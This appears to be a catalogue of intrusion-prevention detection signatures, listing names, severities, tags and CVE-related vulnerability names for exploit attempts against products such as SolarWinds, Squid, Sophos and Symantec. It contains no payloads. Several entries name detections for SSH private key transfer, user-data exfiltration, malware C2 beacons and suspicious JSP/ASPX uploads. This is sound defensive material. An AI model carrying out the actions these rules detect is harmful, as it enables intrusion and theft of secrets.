File-Text_Solarwinds-Orion-Platform-Rendercontrol-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in SolarWinds Orion detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, SolarWinds Orion, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1401-5242
Last changed: sgpkg-ips-1401-5242
Vulnerability: Solarwinds-Orion-Platform-Rendercontrol-Insecure-Deserialization
Description:
Back to top

File-Text_Solarwinds-Server-And-Application-Monitor-Loadextensionfactory-Multiple-Vulnerabilities

About this situation: An attempt to exploit a vulnerability in SolarWinds Orion Server & Application Monitor detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, SolarWinds Server and Application Monitor, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-634-5211
Last changed: sgpkg-ips-672-5211
Vulnerability: Solarwinds-Server-And-Application-Monitor-Loadextensionfactory-Stack-BO
Solarwinds-Server-And-Application-Monitor-Loadextensionfactory-Code-Execution
Description:
Back to top

File-Text_Solarwinds-SunBurst-Beacon

About this situation: Beacon traffic of the Solarwinds SunBurst intrusion
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, SolarWinds Orion, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1305-5242
Last changed: sgpkg-ips-1307-5242
Vulnerability: Solarwinds-SunBurst-Traffic
Description:
Back to top

File-Text_Solarwinds-SunBurst-COSMICGALE

About this situation: COSMICGALE traffic of the Solarwinds SunBurst intrusion
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, SolarWinds Orion, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1307-5242
Last changed: sgpkg-ips-1307-5242
Vulnerability: Solarwinds-SunBurst-Traffic
Description:
Back to top

File-Text_Sonatype-Nexus-Expression-Language-Injection-CVE-2020-10204

About this situation: An attempt to exploit a vulnerability in Sonatype Nexus Repository Manager detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Sonatype Nexus Repository Manager, CVE2018, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1837-5242
Last changed: sgpkg-ips-1837-5242
Vulnerability: Sonatype-Nexus-Expression-Language-Injection-CVE-2020-10204
Sonatype-Nexus-Expression-Language-Injection-CVE-2018-16621
Description:
Back to top

File-Text_SonicWall-SSL-VPN-End-Point-Interrogator-Installer-ActiveX-Control

About this situation: An attempt to exploit a vulnerability in SonicWALL SSL-VPN End-Point Interrogator/Installer ActiveX Control detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, SonicWall SSL-VPN, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-637-5211
Vulnerability: SonicWall-SSL-VPN-End-Point-Interrogator-Installer-ActiveX-Control
Description:
Back to top

File-Text_SonicWall-SSL-VPN-NetExtender-NELaunchCtrl-ActiveX-Control-BOF

About this situation: Detected an attempt to exploit buffer overflow vulnerability in SonicWall SSL-VPN NetExtender
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, SonicWall SSL-VPN NetExtender, CVE2007, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-571-5211
Vulnerability: SonicWall-SSL-VPN-NetExtender-NELaunchCtrl-ActiveX-Control-Buffer-Overflow
Description:
Back to top

File-Text_Sophos-Firewall-User-Portal-And-WebAdmin-Code-Injection

About this situation: An attempt to exploit a vulnerability in Sophos XG Firewall detected
Context: Text File Stream
Severity: 7
Tags: Sophos XG Firewall, Any Hardware, CVE2022, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1510-5242
Last changed: sgpkg-ips-1590-5242
Vulnerability: Sophos-Firewall-User-Portal-And-WebAdmin-Code-Injection
Description:
Back to top

File-Text_Sophos-UTM-WebAdmin-Sid-Command-Injection

About this situation: An attempt to exploit a vulnerability in Sophos UTM WebAdmin detected.
Context: Text File Stream
Severity: 7
Tags: Unix, Linux, Any Hardware, Sophos Web Appliance, CVE2020, Unix not specific, Linux not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1401-5242
Last changed: sgpkg-ips-1728-5242
Vulnerability: Sophos-UTM-WebAdmin-Sid-Command-Injection
Description:
Back to top

File-Text_Sourcegraph-gitserver-sshCommand-RCE

About this situation: An attempt to exploit a vulnerability in the Sourcegraph gitserver component detected.
Context: Text File Stream
Severity: 7
Tags: Unix, Linux, Any Hardware, Sourcegraph, CVE2022, Unix not specific, Linux not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1499-5242
Last changed: sgpkg-ips-1499-5242
Vulnerability: Sourcegraph-gitserver-sshCommand-RCE
Description:
Back to top

File-Text_SpamAssassin-Malformed-Message-DoS

About this situation: An attempt to exploit a vulnerability in SpamAssassin detected
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, SpamAssassin, Any Operating System not specific, Potential Denial of Service
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-487-5211
Vulnerability: SpamAssassin-Malformed-Message-DoS
Description:
Back to top

File-Text_Spectre-Side-Channel-Attack-JavaScript

About this situation: Spectre side-channel channel attack detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, CVE2017, Any Operating System not specific, Suspected Disclosure, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1034-5242
Last changed: sgpkg-ips-1037-5242
Vulnerability: Spectre-Side-Channel-Attack-JavaScript
Description:
Back to top

File-Text_SPIP-Porte-Plume-Plugin-RCE

About this situation: An attempt to exploit a vulnerability in SPIP
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, SPIP, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1769-5242
Last changed: sgpkg-ips-1769-5242
Vulnerability: SPIP-Porte-Plume-Plugin-RCE
Description:
Back to top

File-Text_Sprinter-Tidestone-Formula-One-Defaultfontname-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in HP Sprinter detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, HP Sprinter, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-613-5211
Last changed: sgpkg-ips-613-5211
Vulnerability: HP-Sprinter-Tidestone-Formula-One-Defaultfontname-Buffer-Overflow
Description:
Back to top

File-Text_Squid-Proxy-Esi-Component-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Squid Project Squid detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Squid, CVE2016, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-760-5211
Last changed: sgpkg-ips-760-5211
Vulnerability: Squid-Proxy-Esi-Component-Stack-Buffer-Overflow
Description:
Back to top

File-Text_Squid-Proxy-Esi-Response-Processing-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Squid Project Squid detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Squid, CVE2016, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-787-5211
Last changed: sgpkg-ips-789-5211
Vulnerability: Squid-Proxy-Esi-Response-Processing-Denial-Of-Service
Description:
Back to top

File-Text_Squid-Proxy-Esi-Response-Processing-Denial-Of-Service-2

About this situation: An attempt to exploit a vulnerability in Squid Project Squid detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Squid, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1039-5242
Last changed: sgpkg-ips-1042-5242
Vulnerability: Squid-Proxy-Esi-Response-Processing-Denial-Of-Service-2
Description:
Back to top

File-Text_Squid-Proxy-Esi-Response-Processing-Esi_Assign-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Squid
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Squid, CVE2024, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1837-5242
Last changed: sgpkg-ips-1837-5242
Vulnerability: Squid-Proxy-Esi-Response-Processing-Esi_Assign-Denial-Of-Service
Description:
Back to top

File-Text_Squid-Proxy-Esi-Response-Processing-Esi_Assign-Underflow-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Squid Project Squid detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Squid, CVE2024, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1848-5242
Last changed: sgpkg-ips-1848-5242
Vulnerability: Squid-Proxy-Esi-Response-Processing-Esi_Assign-Underflow-Denial-Of-Service
Description:
Back to top

File-Text_Squid-Proxy-Esi-Response-Processing-Nullpointer-Denial-Of-Service-CVE-2024-45802

About this situation: An attempt to exploit a vulnerability in Squid Project Squid detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Squid, CVE2024, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1848-5242
Last changed: sgpkg-ips-1848-5242
Vulnerability: Squid-Proxy-Esi-Response-Processing-Nullpointer-Denial-Of-Service-CVE-2024-45802
Description:
Back to top

File-Text_Squid-Proxy-Urn-Response-Processing-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Squid Project Squid detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Squid, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1204-5242
Last changed: sgpkg-ips-1204-5242
Vulnerability: Squid-Proxy-Urn-Response-Processing-Heap-Buffer-Overflow
Description:
Back to top

File-Text_SSH-Private-Key-File-Transfer

About this situation: An SSH Private Key file transfer detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1555-5242
Last changed: sgpkg-ips-1555-5242
Vulnerability: SSH-Private-Key-File-Transfer
Description:
Back to top

File-Text_SSReader-ActiveX-Control-Buffer-Overflow

About this situation: Attempt to exploit buffer overflow vulnerability in SSReader detected
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, SSReader, CVE2007, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-573-5211
Vulnerability: SSReader-ActiveX-Control-Buffer-Overflow
Description:
Back to top

File-Text_Star-Blizzard-Collect-and-Send-User-Data-POST-Request

About this situation: Traffic generated by Star Blizzard infrastructure was detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1678-5242
Last changed: sgpkg-ips-1678-5242
Vulnerability: Star-Blizzard-Malicious-Traffic
Description:
Back to top

File-Text_STARWHALE-Malware-C2-Traffic

About this situation: STARWHALE malware C2 traffic was detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1440-5242
Last changed: sgpkg-ips-1440-5242
Vulnerability: STARWHALE-Malware-C2-Traffic
Description:
Back to top

File-Text_Sun-Java-Calendar-Deserialization-Privilege-Escalation

About this situation: A possible attempt to exploit a security vulnerability in Sun JVM.
Context: Text File Stream
Severity: 7
Tags: Windows, Linux, Mac OS X, Any Hardware, Sun Java Runtime Environment, Sun Java Development Kit, CVE2008, Windows not specific, Linux not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-665-5211
Last changed: sgpkg-ips-677-5211
Vulnerability: Sun-Java-Calendar-Deserialization-Privilege-Escalation
Description:
Back to top

File-Text_Sun-Java-JRE-getSoundbank-Buffer-Overflow

About this situation: An attempt to exploit a Sun Java JRE getSoundbank Buffer Overflow vulnerability detected
Context: Text File Stream
Severity: 7
Tags: Windows, Mac OS X, Any Hardware, Sun Java Runtime Environment, CVE2009, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-782-5211
Last changed: sgpkg-ips-863-5242
Vulnerability: Sun-Java-JRE-getSoundbank-Buffer-Overflow
Description:
Back to top

File-Text_Sun-Java-Plugin-JavaScript-Security-Restriction-Bypass

About this situation: Attempt to exploit a vulnerability in Sun JRE detected
Context: Text File Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, CVE2004, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Sun-Java-Plugin-JavaScript-Security-Restriction-Bypass
Description:
Back to top

File-Text_Sun-Java-Web-Start-Launch-Command-Line-Injection

About this situation: An attempt to exploit a command-line injection vulnerability in Sun Java Web Start detected
Context: Text File Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1188-5242
Vulnerability: Sun-Java-Web-Start-Launch-Command-Line-Injection
Description:
Back to top

File-Text_Sun-Java-Web-Start-Plugin-Argument-Injection

About this situation: An attempt to exploit a Sun Java Web Start Plugin Argument Injection vulnerability detected.
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Sun Java Web Start, CVE2010, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-730-5211
Last changed: sgpkg-ips-730-5211
Vulnerability: Sun-Java-Web-Start-Plugin-Argument-Injection
Description:
Back to top

File-Text_Sun-Microsystems-JRE-Isinstalled.dnsresolve-Function-Memory-Exception

About this situation: An attempt to exploit a vulnerability in Sun Microsystems Java Web Start detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Sun Java Runtime Environment, Sun Java Web Start, Sun Java Development Kit, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-551-5211
Vulnerability: Sun-Microsystems-JRE-Isinstalled.dnsresolve-Function-Memory-Exception
Description:
Back to top

File-Text_Sunway-ForceControl-SCADA-Login-Method-ActiveX-Buffer-Overflow-Vulnerability

About this situation: Vulnerable method usage detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Sunway ForceControl, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-568-5211
Last changed: sgpkg-ips-568-5211
Vulnerability: Sunway-ForceControl-SCADA-Login-Method-ActiveX-Buffer-Overflow-Vulnerability
Description:
Back to top

File-Text_SupportSoft-Products-ActiveX-Control-Buffer-Overflow

About this situation: Attempt to exploit a buffer overflow vulnerability in SupportSoft ActiveX control was detected
Context: Text File Stream
Severity: 7
Tags: Windows, x86, SupportSoft Products, Symantec Norton AntiVirus, Symantec Norton System Works, Symantec Norton Internet Security, CVE2006, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-551-5211
Vulnerability: HTTP_SupportSoft-Products-ActiveX-Control-Buffer-Overflow
Description:
Back to top

File-Text_Suspected_Website_Defacement

About this situation: A suspected website defacement was detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1228-5242
Last changed: sgpkg-ips-1265-5242
Vulnerability: Suspected_Website_Defacement
Description:
Back to top

File-Text_Suspicious-ASPX-File-Content-Upload

About this situation: A suspicious ASPX file upload detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1755-5242
Last changed: sgpkg-ips-1755-5242
Vulnerability: Suspicious-ASPX-File-Upload
Description:
Back to top

File-Text_Suspicious-AutoDetect-Command

About this situation: Use of a non-documented JavaScript command was detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer 9.0, Internet Explorer 10.0, Internet Explorer 11.0, MS2015-06, CVE2015, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-655-5211
Last changed: sgpkg-ips-655-5211
Vulnerability: Microsoft-Internet-Explorer-CVE-2015-1752
Description:
Back to top

File-Text_Suspicious-Command-Inside-Zip-File

About this situation: An suspicious Zip file detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1142-5242
Last changed: sgpkg-ips-1142-5242
Description:
Back to top

File-Text_Suspicious-Decimal-Content

About this situation: Suspicious decimal content was detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1361-5242
Last changed: sgpkg-ips-1361-5242
Vulnerability: Suspicious-Decimal-Content
Description:
Back to top

File-Text_Suspicious-Flash-Detector-Script

About this situation: Suspicious flash detector script has been detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-979-5242
Last changed: sgpkg-ips-979-5242
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

File-Text_Suspicious-Flash-File-Source

About this situation: A call for a Flash file from a suspicious source address was detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Adobe Flash Player, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-730-5211
Last changed: sgpkg-ips-730-5211
Description:
Back to top

File-Text_Suspicious-HTML-File

About this situation: Detected Suspicious Content in a HTML file
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-791-5211
Last changed: sgpkg-ips-1729-5242
Description:
Back to top

File-Text_Suspicious-HTTP-Equiv-Parameter

About this situation: A content verification HTTP parameter inside html detected
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-630-5211
Description:
Back to top

File-Text_Suspicious-Internet-Shortcut-File

About this situation: A suspicious internet shortcut file was detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2023-11, MS2025-02, CVE2023, CVE2025, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1802-5242
Last changed: sgpkg-ips-1841-5242
Vulnerability: Malicious-Internet-Shortcut-File
Microsoft-Windows-Internet-Shortcut-File-Security-Feature-Bypass-CVE-2023-36025
Microsoft-Windows-NTLM-Hash-Disclosure-Vulnerability-CVE-2025-21377
Description:
Back to top

File-Text_Suspicious-Interpreted-Script

About this situation: An interpreted script with suspicious content
Context: Text File Stream
Severity: 7
Tags: Unix, Linux, Any Hardware, Unix not specific, Linux not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1860-5242
Last changed: sgpkg-ips-1860-5242
Description:
Back to top

File-Text_Suspicious-Java-Serialized-Object

About this situation: A suspicious Java serialized object detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1547-5242
Last changed: sgpkg-ips-1669-5242
Vulnerability: Ysoserial-Generated-Java-Serialized-Object
Description:
Back to top

File-Text_Suspicious-JScript-In-XML

About this situation: Suspicious JScript found in XML
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-952-5242
Last changed: sgpkg-ips-952-5242
Vulnerability: JavaScript-Obfuscation
Description:
Back to top

File-Text_Suspicious-Jsp-File-Content-Upload

About this situation: A suspicious JSP file upload detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Software, CVE2024, Any Operating System not specific, Any Software not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1667-5242
Last changed: sgpkg-ips-1858-5242
Vulnerability: Suspicious-Jsp-File-Upload
Apache-Tomcat-getCanonicalPath-Remote-Code-Execution-CVE-2024-56337
Description:
Back to top

File-Text_Suspicious-Jsp-File-Upload

About this situation: A suspicious JSP file upload detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1527-5242
Last changed: sgpkg-ips-1820-5242
Vulnerability: Suspicious-Jsp-File-Upload
Description:
Back to top

File-Text_Suspicious-MS-Search-URI-Scheme-Link-In-HTML

About this situation: search-ms or search URI scheme detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2024, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1738-5242
Last changed: sgpkg-ips-1829-5242
Vulnerability: MS-Search-URI-Scheme
Windows-Mark-Of-The-Web-Bypass-CVE-2024-38213
Description:
Back to top

File-Text_Suspicious-MSDT-URI-Scheme-In-HTML

About this situation: A suspicious MSDT URI Scheme in HTML detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Office, CVE2022, Windows not specific, Microsoft Office not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1472-5242
Last changed: sgpkg-ips-1620-5242
Vulnerability: Suspicious-MSDT-URI-Scheme-In-HTML
Description:
Back to top

File-Text_Suspicious-Rfc822-Response-From-Server

About this situation: A suspicious http response was detected
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-1374-5242
Last changed: sgpkg-ips-1374-5242
Description:
Back to top

File-Text_Suspicious-Text-File

About this situation: A suspicious text file detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-498-5211
Last changed: sgpkg-ips-1792-5242
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

File-Text_Suspicious-Text-File-2

About this situation: A suspicious text file detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-844-5242
Last changed: sgpkg-ips-844-5242
Vulnerability: Generic-HTTP-Exploit
Description:
Back to top

File-Text_Suspiciously-Large-Windows-Script-File

About this situation: A transfer of a suspiciously large Windows script file detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1863-5242
Last changed: sgpkg-ips-1863-5242
Vulnerability: Suspiciously-Large-Windows-Script-File
Description:
Back to top

File-Text_Suspicious_Inline_Iframe_Element-1

About this situation: A suspicious iframe element detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1232-5242
Last changed: sgpkg-ips-1261-5242
Vulnerability: File-Text_Suspicious_Inline_Iframe_Element
Description:
Back to top

File-Text_Suspicious_Inline_Iframe_Element-2

About this situation: A suspicious iframe element detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1244-5242
Last changed: sgpkg-ips-1244-5242
Vulnerability: File-Text_Suspicious_Inline_Iframe_Element
Description:
Back to top

File-Text_Suspicious_Script_Encoding

About this situation: Suspicious traffic detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1349-5242
Last changed: sgpkg-ips-1349-5242
Description:
Back to top

File-Text_Symantec-AeXNSConsoleUtilities-Runcmd-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in multiple Symantec products detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Symantec Altiris Deployment Solution, Symantec Altiris Notification Server, Symantec Management Platform, CVE2009, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-551-5211
Vulnerability: Symantec-Multiple-Products-AeXNSConsoleUtilities-Runcmd-Buffer-Overflow
Description:
Back to top

File-Text_Symantec-Altiris-Deployment-Solution-ActiveX-File-Download

About this situation: An attempt to exploit a vulnerability in Symantec Altiris Deployment Solution detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Symantec Altiris Deployment Solution, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-551-5211
Vulnerability: Symantec-Altiris-Deployment-Solution-ActiveX-File-Download
Description:
Back to top

File-Text_Symantec-AntiVirus-Cliproxy-ActiveX-Control-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Symantec Antivirus detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Symantec Norton AntiVirus, Symantec Client Security, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-573-5211
Vulnerability: Symantec-AntiVirus-Cliproxy-ActiveX-Control-Buffer-Overflow
Description:
Back to top

File-Text_Symantec-AppStream-Client-ActiveX-Control-Vulnerable-Method-Call

About this situation: Detected an attempt to call a vulnerable method in Symantec AppStream Client
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Symantec AppStream Client, CVE2008, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-720-5211
Vulnerability: Symantec-AppStream-Client-LaunchObj-ActiveX-Control-Multiple-Weaknesses
Description:
Back to top

File-Text_Symantec-Backup-Exec-For-Windows-Server-Scheduler-ActiveX-Control-BOF

About this situation: An attempt to exploit a buffer overflow vulnerability in Symantec Backup Exec for Windows Servers detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Symantec Backup Exec for Windows Server, CVE2007, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-630-5211
Vulnerability: HTTP-Symantec-Backup-Exec-For-Windows-Server-Scheduler-ActiveX-Control-BOF
Description:
Back to top

File-Text_Symantec-Multiple-Products-AeXNSConsoleUtilities-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Symantec Altiris Deployment Solution detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Symantec Altiris Deployment Solution, Symantec Altiris Notification Server, Symantec Management Platform, CVE2009, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-551-5211
Vulnerability: Symantec-Multiple-Products-AeXNSConsoleUtilities-Buffer-Overflow
Description:
Back to top

File-Text_Symantec-Norton-AntiVirus-Stack-Exhaustion

About this situation: An attempt to exploit a vulnerability in Symantec Norton AntiVirus detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Symantec Norton AntiVirus, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-416-4219
Vulnerability: Symantec-Norton-AntiVirus-Stack-Exhaustion
Description:
Back to top

File-Text_Symantec-Norton-Internet-Security-2006-COM-Object-Security-Bypass-Vulnerability

About this situation: An attempt to exploit a vulnerability in Symantec Norton was detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Symantec Norton Internet Security, CVE2006, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-632-5211
Last changed: sgpkg-ips-632-5211
Vulnerability: Symantec-Norton-Internet-Security-2006-COM-Object-Security-Bypass
Description:
Back to top

File-Text_Symantec-Norton-Personal-Firewall-2004-ActiveX-Control-Buffer-Overflow

About this situation: Attempt to exploit a vulnerability in Symantec Norton Personal Firewall detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Symantec Norton Personal Firewall, Symantec Norton Internet Security, CVE2007, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-634-5211
Last changed: sgpkg-ips-634-5211
Vulnerability: Symantec-Norton-Personal-Firewall-2004-ActiveX-Control-Buffer-Overflow
Description:
Back to top

